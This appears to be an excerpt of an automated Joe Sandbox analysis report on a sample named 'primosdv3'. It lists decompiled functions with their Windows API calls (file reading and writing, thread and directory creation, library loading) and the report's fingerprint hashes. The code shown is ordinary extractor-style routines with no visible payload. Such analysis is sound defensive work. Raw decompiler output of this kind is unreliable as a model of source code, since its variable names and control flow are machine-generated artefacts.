Part of subcall function 00C71FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00C6C116,00000000,.exe,?,?,00000800,?,?,?,00C78E3C), ref: 00C71FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00C7ABE9

Strings

EDIT, xrefs: 00C7ABCD, 00C7ABD8, 00C7ABE5

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: c35e4762cacc2a1d5ed75642b6aa6e487fe15442b9a4d2e160e3971b44fd2fc3
Instruction ID: 18670bbea07f5c1b60e0b74907f07587b9cdeb5a2cca97305d3cf09db4433e4c
Opcode Fuzzy Hash: c35e4762cacc2a1d5ed75642b6aa6e487fe15442b9a4d2e160e3971b44fd2fc3
Instruction Fuzzy Hash: 31F0823360022877DB205764AC09F9F766C9B86B40F488011FA49A21C0D760EB4185B6

Uniqueness

Uniqueness Score: -1.00%

Function 00C7AC16 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E00C7AC16(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t10;

				_t10 = E00C7081B(L"riched20.dll"); // executed
				 *__ecx = _t10;
				 *0xcc3174(0); // executed
				_v16 = 8;
				_v12 = 0x7ff;
				 *0xcc3034( &_v16); // executed
				_v32 = 1;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				L00C7EB2C(); // executed
				 *0xcc3090(0xca8438,  &_v8,  &_v32, 0); // executed
				return __ecx;
			}

0x00c7ac25
0x00c7ac2c
0x00c7ac2f
0x00c7ac38
0x00c7ac40
0x00c7ac47
0x00c7ac51
0x00c7ac5c
0x00c7ac60
0x00c7ac63
0x00c7ac66
0x00c7ac70
0x00c7ac7b

APIs

Part of subcall function 00C7081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00C70836
Part of subcall function 00C7081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00C6F2D8,Crypt32.dll,00000000,00C6F35C,?,?,00C6F33E,?,?,?), ref: 00C70858

OleInitialize.OLE32(00000000), ref: 00C7AC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00C7AC66
SHGetMalloc.SHELL32(00CA8438), ref: 00C7AC70

Strings

riched20.dll, xrefs: 00C7AC1E

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll
API String ID: 3498096277-3360196438
Opcode ID: 2f48919e5b16783bf913a964ad09a105c6af7b1c8cf10d9c3ac63cfc8445b7b3
Instruction ID: 50bd7bcf900f84a944f2fae18a5350967be3ca0895d401093704b0ba33ebdbb0
Opcode Fuzzy Hash: 2f48919e5b16783bf913a964ad09a105c6af7b1c8cf10d9c3ac63cfc8445b7b3
Instruction Fuzzy Hash: 22F0F9B5900249ABCB10AFA9D849EEFFFFCEF85704F00816AE415A2241DBB456058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C69785 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E00C69785(void* __ecx, void* _a4, long _a8) {
				long _v8;
				int _t14;
				signed int _t15;
				void* _t25;

				_push(__ecx);
				_t25 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x10)) == 1) {
					 *(_t25 + 8) = GetStdHandle(0xfffffff6);
				}
				_t14 = ReadFile( *(_t25 + 8), _a4, _a8,  &_v8, 0); // executed
				if(_t14 != 0) {
					_t15 = _v8;
				} else {
					_t16 = E00C698BC(_t25);
					if(_t16 == 0) {
						L7:
						if( *((intOrPtr*)(_t25 + 0x10)) != 1) {
							L10:
							if( *((intOrPtr*)(_t25 + 0x10)) != 0 || _a8 <= 0x8000) {
								L14:
								_t15 = _t16 | 0xffffffff;
							} else {
								_t16 = GetLastError();
								if(_t16 != 0x21) {
									goto L14;
								} else {
									_push(0x8000);
									goto L6;
								}
							}
						} else {
							_t16 = GetLastError();
							if(_t16 != 0x6d) {
								goto L10;
							} else {
								_t15 = 0;
							}
						}
					} else {
						_t16 = 0x4e20;
						if(_a8 <= 0x4e20) {
							goto L7;
						} else {
							_push(0x4e20);
							L6:
							_push(_a4);
							_t15 = E00C69785(_t25);
						}
					}
				}
				return _t15;
			}

0x00c69788
0x00c6978a
0x00c69791
0x00c6979b
0x00c6979b
0x00c697ad
0x00c697b5
0x00c69811
0x00c697b7
0x00c697b9
0x00c697c0
0x00c697d9
0x00c697dd
0x00c697ee
0x00c697f2
0x00c6980c
0x00c6980c
0x00c697fe
0x00c697fe
0x00c69807
0x00000000
0x00c69809
0x00c69809
0x00000000
0x00c69809
0x00c69807
0x00c697df
0x00c697df
0x00c697e8
0x00000000
0x00c697ea
0x00c697ea
0x00c697ea
0x00c697e8
0x00c697c2
0x00c697c2
0x00c697ca
0x00000000
0x00c697cc
0x00c697cc
0x00c697cd
0x00c697cd
0x00c697d2
0x00c697d2
0x00c697ca
0x00c697c0
0x00c69817

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00C69795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00C697AD
GetLastError.KERNEL32 ref: 00C697DF
GetLastError.KERNEL32 ref: 00C697FE

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 0111757426e18a2f01c6913941c3491c16f5dd0dac629c709f145db6f7ca89d3
Instruction ID: 51cbad0186693299d2b98ddd9fc79535ad69eba3da2d5f66dce27e0afe8642ad
Opcode Fuzzy Hash: 0111757426e18a2f01c6913941c3491c16f5dd0dac629c709f145db6f7ca89d3
Instruction Fuzzy Hash: 68117C30910204EBDF305F65C888A6D37BDFB5A364F10892AE426861D0D7749F44DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C8AD34 Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E00C8AD34(signed int _a4) {
				signed int _t9;
				void* _t10;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0xcc25d8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0xc973f0 + _t9 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x2b9f4dad
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x00c8ad39
0x00c8ad3d
0x00c8ad44
0x00c8ad48
0x00c8ad56
0x00c8ad66
0x00c8ad6c
0x00c8ad70
0x00c8ad99
0x00c8ad9b
0x00c8ad9f
0x00c8ada2
0x00c8ada2
0x00c8ada8
0x00c8adaa
0x00000000
0x00c8adab
0x00c8ad72
0x00c8ad7b
0x00c8ad8a
0x00c8ad7d
0x00c8ad80
0x00c8ad86
0x00c8ad86
0x00c8ad8e
0x00000000
0x00c8ad90
0x00c8ad93
0x00c8ad95
0x00000000
0x00c8ad95
0x00c8ad8e
0x00c8ad4a
0x00c8ad4f
0x00000000

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00C840EF,00000000,00000000,?,00C8ACDB,00C840EF,00000000,00000000,00000000,?,00C8AED8,00000006,FlsSetValue), ref: 00C8AD66
GetLastError.KERNEL32(?,00C8ACDB,00C840EF,00000000,00000000,00000000,?,00C8AED8,00000006,FlsSetValue,00C97970,FlsSetValue,00000000,00000364,?,00C898B7), ref: 00C8AD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00C8ACDB,00C840EF,00000000,00000000,00000000,?,00C8AED8,00000006,FlsSetValue,00C97970,FlsSetValue,00000000), ref: 00C8AD80

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: a4a9b740d20f130c0e52e1d4d13734c367219481df12666831f8188df41488d6
Instruction ID: f617b501f0424fabf083a6d80275a7b5164b69a4caa4d3e2273a3463a5c52ad8
Opcode Fuzzy Hash: a4a9b740d20f130c0e52e1d4d13734c367219481df12666831f8188df41488d6
Instruction Fuzzy Hash: 2E014736201632ABD7215B69DC48B5B7B98EF00BA67100623FD16D3550C720ED01C7E9

Uniqueness

Uniqueness Score: -1.00%

Function 00C7101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
threadCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00C7101F() {
				long _v4;
				void* __ecx;
				void* __esi;
				void* __ebp;
				void* _t5;
				void* _t7;
				int _t8;
				void* _t12;
				void** _t18;
				void* _t22;

				_t12 = 0;
				if( *0xca1098 > 0) {
					_t18 = 0xca109c;
					do {
						_t7 = CreateThread(0, 0x10000, E00C71160, 0xca1098, 0,  &_v4); // executed
						_t22 = _t7;
						_t25 = _t22;
						if(_t22 == 0) {
							_push(L"CreateThread failed");
							_push(0xca1098);
							E00C66C36(0xca1098);
							E00C66C31(E00C66DCB(0xca1098, _t25), 0xca1098, 0xca1098, 2);
						}
						 *_t18 = _t22;
						 *0x00CA119C =  *((intOrPtr*)(0xca119c)) + 1;
						_t8 =  *0xca81e0; // 0x0
						if(_t8 != 0) {
							_t8 = SetThreadPriority( *_t18, _t8);
						}
						_t12 = _t12 + 1;
						_t18 =  &(_t18[1]);
					} while (_t12 <  *0xca1098);
					return _t8;
				}
				return _t5;
			}

0x00c71024
0x00c71028
0x00c7102c
0x00c7102f
0x00c71043
0x00c71049
0x00c7104b
0x00c7104d
0x00c7104f
0x00c71054
0x00c71059
0x00c71071
0x00c71071
0x00c71076
0x00c71078
0x00c7107e
0x00c71085
0x00c7108a
0x00c7108a
0x00c71090
0x00c71091
0x00c71094
0x00000000
0x00c71099
0x00c7109d

APIs

CreateThread.KERNELBASE ref: 00C71043
SetThreadPriority.KERNEL32(?,00000000), ref: 00C7108A

Part of subcall function 00C66C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C66C54

Strings

CreateThread failed, xrefs: 00C7104F

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: 79e9689b8e57cb89f27f142e16675408181825e9fa43d90473db1eb8a53a0c4e
Instruction ID: 78e2106f62e8fd6d020a152035ba2d0024b3ab843064a3089405f3ddcf7d880c
Opcode Fuzzy Hash: 79e9689b8e57cb89f27f142e16675408181825e9fa43d90473db1eb8a53a0c4e
Instruction Fuzzy Hash: A20126B530034A7FD7305E68AC81B7A73A8FB40755F24002EFE8A52180CAA068858220

Uniqueness

Uniqueness Score: -1.00%

Function 00C69F7A Relevance: 4.6, APIs: 3, Instructions: 111
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00C69F7A() {
				void* __ecx;
				void* __ebp;
				long _t37;
				void* _t42;
				void* _t46;
				signed int _t49;
				intOrPtr* _t53;
				void** _t54;
				DWORD* _t61;
				void* _t65;
				intOrPtr _t66;
				long _t67;
				intOrPtr* _t69;
				void* _t70;

				_t67 =  *(_t70 + 0x18);
				_t69 = _t53;
				if(_t67 != 0) {
					_t54 = _t69 + 8;
					 *(_t70 + 0xc) = _t54;
					if( *((intOrPtr*)(_t69 + 0x10)) != 1) {
						 *(_t70 + 0xc) = _t54;
					} else {
						_t46 = GetStdHandle(0xfffffff5);
						_t54 = _t69 + 8;
						 *_t54 = _t46;
					}
					while(1) {
						 *(_t70 + 0x10) =  *(_t70 + 0x10) & 0x00000000;
						_t49 = 0;
						if( *((intOrPtr*)(_t69 + 0x10)) == 0) {
							goto L13;
						}
						_t65 = 0;
						if(_t67 == 0) {
							L15:
							if( *((char*)(_t69 + 0x1e)) == 0 ||  *((intOrPtr*)(_t69 + 0x10)) != 0) {
								L22:
								 *((char*)(_t69 + 0xc)) = 1;
								return _t49;
							} else {
								_t64 = _t69 + 0x32;
								if(E00C66BAA(0xca1098, _t69 + 0x32, 0) == 0) {
									E00C66E98(0xca1098, _t69, 0, _t64);
									goto L22;
								}
								_t54 =  *(_t70 + 0x14);
								if( *(_t70 + 0x10) < _t67 &&  *(_t70 + 0x10) > 0) {
									_t66 =  *_t69;
									 *0xc93278(0);
									_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t66 + 0x14))))();
									asm("sbb edx, 0x0");
									 *0xc93278(_t42 -  *(_t70 + 0x14), _t61);
									 *((intOrPtr*)(_t66 + 0x10))();
									_t67 =  *(_t70 + 0x20);
									_t54 =  *(_t70 + 0x14);
								}
								continue;
							}
						} else {
							goto L8;
						}
						while(1) {
							L8:
							_t37 = _t67 - _t65;
							if(_t37 >= 0x4000) {
								_t37 = 0x4000;
							}
							_t61 = _t70 + 0x14;
							_t13 = WriteFile( *_t54,  *(_t70 + 0x28) + _t65, _t37, _t61, 0) == 1;
							_t49 = _t49 & 0xffffff00 | _t13;
							if(_t13 != 0) {
								break;
							}
							_t54 =  *(_t70 + 0x14);
							_t65 = _t65 + 0x4000;
							if(_t65 < _t67) {
								continue;
							}
							break;
						}
						L14:
						if(_t49 != 0) {
							goto L22;
						}
						goto L15;
						L13:
						WriteFile( *_t54,  *(_t70 + 0x28), _t67, _t70 + 0x14, 0);
						asm("sbb bl, bl");
						_t49 = 1;
						goto L14;
					}
				}
				return 1;
			}

0x00c69f7e
0x00c69f82
0x00c69f86
0x00c69f93
0x00c69f96
0x00c69f9a
0x00c69fab
0x00c69f9c
0x00c69f9e
0x00c69fa4
0x00c69fa7
0x00c69fa7
0x00c69fb1
0x00c69fb1
0x00c69fb6
0x00c69fbc
0x00000000
0x00000000
0x00c69fbe
0x00c69fc2
0x00c6a024
0x00c6a028
0x00c6a0a2
0x00c6a0a5
0x00000000
0x00c6a030
0x00c6a032
0x00c6a042
0x00c6a09d
0x00000000
0x00c6a09d
0x00c6a044
0x00c6a04c
0x00c6a05d
0x00c6a067
0x00c6a06f
0x00c6a078
0x00c6a07d
0x00c6a085
0x00c6a088
0x00c6a08c
0x00c6a08c
0x00000000
0x00c6a04c
0x00000000
0x00000000
0x00000000
0x00c69fc4
0x00c69fc4
0x00c69fc6
0x00c69fcd
0x00c69fcf
0x00c69fcf
0x00c69fd6
0x00c69fee
0x00c69fee
0x00c69ff1
0x00000000
0x00000000
0x00c69ff3
0x00c69ff7
0x00c69fff
0x00000000
0x00000000
0x00000000
0x00c6a001
0x00c6a020
0x00c6a022
0x00000000
0x00000000
0x00000000
0x00c6a003
0x00c6a011
0x00c6a01c
0x00c6a01e
0x00000000
0x00c6a01e
0x00c69fb1
0x00000000

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,00C6D343,00000001,?,?,?,00000000,00C7551D,?,?,?), ref: 00C69F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00C7551D,?,?,?,?,?,00C74FC7,?), ref: 00C69FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00C6D343,00000001,?,?), ref: 00C6A011

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 59917e9831b7e8e0c5a7077a875f7126a9cc16acf6f29b6ae9f0ef4ec09f89f0
Instruction ID: 9109b812ca69da02acd576cb4ede95a99b3597f5021fec42eee57c1e6940299c
Opcode Fuzzy Hash: 59917e9831b7e8e0c5a7077a875f7126a9cc16acf6f29b6ae9f0ef4ec09f89f0
Instruction Fuzzy Hash: 4731D331208345AFDB24CF20D898B6EB7A9FF85715F04051DF952A7290C775AE48CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 00C6A2B2 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C6A2B2(void* __eflags, WCHAR* _a4, char _a8, intOrPtr _a12) {
				short _v4100;
				signed int _t11;
				void* _t14;
				void* _t17;
				int _t24;
				long _t25;
				WCHAR* _t26;
				void* _t27;

				_t27 = __eflags;
				E00C7EC50(0x1000);
				_t26 = _a4;
				_t11 =  *(E00C6C27E(_t27, _t26)) & 0x0000ffff;
				if(_t11 != 0x2e && _t11 != 0x20) {
					_t24 = CreateDirectoryW(_t26, 0); // executed
					if(_t24 != 0) {
						L6:
						if(_a8 != 0) {
							E00C6A4ED(_t26, _a12);
						}
						return 0;
					}
				}
				if(E00C6A231(_t26) == 0 && E00C6BB03(_t26,  &_v4100, 0x800) != 0 && CreateDirectoryW( &_v4100, 0) != 0) {
					goto L6;
				}
				_t25 = GetLastError();
				_t14 = 2;
				__eflags = _t25 - _t14;
				if(_t25 != _t14) {
					__eflags = _t25 - 3;
					_t17 = (0 | _t25 == 0x00000003) + 1;
					__eflags = _t17;
					return _t17;
				}
				return _t14;
			}

0x00c6a2b2
0x00c6a2ba
0x00c6a2c0
0x00c6a2c9
0x00c6a2cf
0x00c6a2d9
0x00c6a2e1
0x00c6a316
0x00c6a31a
0x00c6a320
0x00c6a320
0x00000000
0x00c6a325
0x00c6a2e1
0x00c6a2eb
0x00000000
0x00000000
0x00c6a32f
0x00c6a333
0x00c6a334
0x00c6a336
0x00c6a33a
0x00c6a340
0x00c6a340
0x00000000
0x00c6a340
0x00c6a343

APIs

Part of subcall function 00C6C27E: _wcslen.LIBCMT ref: 00C6C284

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00C6A175,?,00000001,00000000,?,?), ref: 00C6A2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00C6A175,?,00000001,00000000,?,?), ref: 00C6A30C
GetLastError.KERNEL32(?,?,?,?,00C6A175,?,00000001,00000000,?,?), ref: 00C6A329

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: 5e13190ee264f2deb13748f6d05e0afd1431a50577b77021b96292789346c10c
Instruction ID: b637bfd43db3ebbbc84b9bd47217bbe4d4f37ca7eca2bfd1e2a0b7059f1a1cbe
Opcode Fuzzy Hash: 5e13190ee264f2deb13748f6d05e0afd1431a50577b77021b96292789346c10c
Instruction Fuzzy Hash: 8901D8351002106AEF31AB754CC9BFD3748AF09780F044425F912F61A1D754CB81DEB6

Uniqueness

Uniqueness Score: -1.00%

Function 00C8B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00C8B893(void* __edx, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed char _v1828;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t63;
				void* _t67;
				signed char _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t87;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				char* _t94;
				intOrPtr _t96;
				signed int _t97;

				_t63 =  *0xc9e7ac; // 0x2b9f4dac
				_v8 = _t63 ^ _t97;
				_t96 = _a4;
				_t4 = _t96 + 4; // 0x5efc4d8b
				if(GetCPInfo( *_t4,  &_v1820) == 0) {
					_t47 = _t96 + 0x119; // 0xc8bee6
					_t93 = _t47;
					_t87 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t93;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t94 = _t93 + _t87;
						_t69 = _t68 + _t94;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t94 = 0;
							} else {
								_t72 = _t96 + _t87;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t87 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t96 + _t87 + 0x19) =  *(_t96 + _t87 + 0x19) | 0x00000010;
							_t54 = _t87 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t94 = _t73;
						}
						_t68 = _v1828;
						_t61 = _t96 + 0x119; // 0xc8bee6
						_t93 = _t61;
						_t87 = _t87 + 1;
						__eflags = _t87 - 0x100;
					} while (_t87 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t97 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t90 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t103 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t93 =  *(_t90 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t93;
							if(_t76 > _t93) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t97 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t90 = _t90 + 2;
						__eflags = _t90;
						_t75 =  *_t90;
					}
					_t13 = _t96 + 4; // 0x5efc4d8b
					E00C8C988(_t93, _t103, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
					_t16 = _t96 + 4; // 0x5efc4d8b
					_t19 = _t96 + 0x21c; // 0xdb855708
					E00C8AB78(0, _t103, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0); // executed
					_t21 = _t96 + 4; // 0x5efc4d8b
					_t23 = _t96 + 0x21c; // 0xdb855708
					E00C8AB78(0, _t103, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
					_t91 = 0;
					do {
						_t68 =  *(_t97 + _t91 * 2 - 0x704) & 0x0000ffff;
						if((_t68 & 0x00000001) == 0) {
							__eflags = _t68 & 0x00000002;
							if((_t68 & 0x00000002) == 0) {
								 *(_t96 + _t91 + 0x119) = 0;
							} else {
								_t37 = _t96 + _t91 + 0x19;
								 *_t37 =  *(_t96 + _t91 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t68 =  *((intOrPtr*)(_t97 + _t91 - 0x304));
								goto L15;
							}
						} else {
							 *(_t96 + _t91 + 0x19) =  *(_t96 + _t91 + 0x19) | 0x00000010;
							_t68 =  *((intOrPtr*)(_t97 + _t91 - 0x204));
							L15:
							 *(_t96 + _t91 + 0x119) = _t68;
						}
						_t91 = _t91 + 1;
					} while (_t91 < 0x100);
				}
				return E00C7FBBC(_t68, 0, _v8 ^ _t97, _t93, 0x100, _t96);
			}

0x00c8b89e
